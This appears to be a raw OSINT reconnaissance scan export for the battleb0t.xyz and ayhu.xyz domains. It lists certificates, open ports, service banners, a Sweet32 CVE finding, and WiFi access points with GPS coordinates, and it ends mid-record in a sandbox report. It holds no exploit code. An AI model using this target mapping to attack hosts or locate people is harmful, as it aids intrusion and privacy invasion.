OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:44:15 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz:443 | funny.battleb0t.xyz |
| 2023-05-12 03:09:12 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 207.154.228.160 | 207.154.228.169 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Canyon Crossing WiFi-scanning (Net ID: 00:18:0A:51:68:AC) | 37.751, -97.822 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:993 | 87.248.157.102 |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 001wwang.github.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | QUEER (Category: social)
https://queer.pl/user/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-6922 (Net ID: 00:1D:D4:19:69:20) | 32.8608, -79.9746 |
| 2023-05-12 02:53:45 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: D718:0A5D:5B243B:873E4F:645D98BE
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100097-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683855551.810015,VS0,VE33
Vary: Accept-Encoding
X-Fastly-Request-ID: c4364b8ebfd36798d0a52940340cb79811a0b765
| 2606:50c0:8002::153 |
| 2023-05-12 02:58:46 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | InsaneJournal (Category: social)
https://login.insanejournal.com/profile | login |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:8080 | 188.114.96.0/24 |
| 2023-05-12 02:44:23 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:50:48.097 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Mar 13 13:50:48.131 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE522 (Net ID: 00:01:E6:93:CB:2D) | 37.780462,-122.390564 |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00lt00.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_5.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00088.github.io]
https://www.openphish.com/feed.txt | 00088.github.io |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/login | login |
| 2023-05-12 02:53:32 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: E278:52F1:2384BF1:3304643:645CBD7D
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100155-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683799422.885849,VS0,VE32
Vary: Accept-Encoding
X-Fastly-Request-ID: 2755bc270974a8f69ac639a54e3259fa11be8083
| 185.199.111.153 |
| 2023-05-12 03:22:42 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | ayhu.com.br | ayhu.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | slideshare (Category: social)
https://www.slideshare.net/ayshoo | ayshoo |
| 2023-05-12 02:45:32 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 34.148.97.127 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:9E:68) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:A3:7E:2A) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation5.0 (Net ID: 00:01:9F:30:06:7C) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:53:12 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 3 | 0 | None | [{"url": "https://panel.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://panel.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | panel.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:92:82:51) | 41.8781, -87.6298 |
| 2023-05-12 03:01:05 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.113): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:14 | IP Address | No | DNS Resolver | 59 | 0 | 1 | 0 | None | 104.21.6.166 | ayhu.xyz |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.163): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | info@cndglobelogistics.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, 
u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image 
data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': 
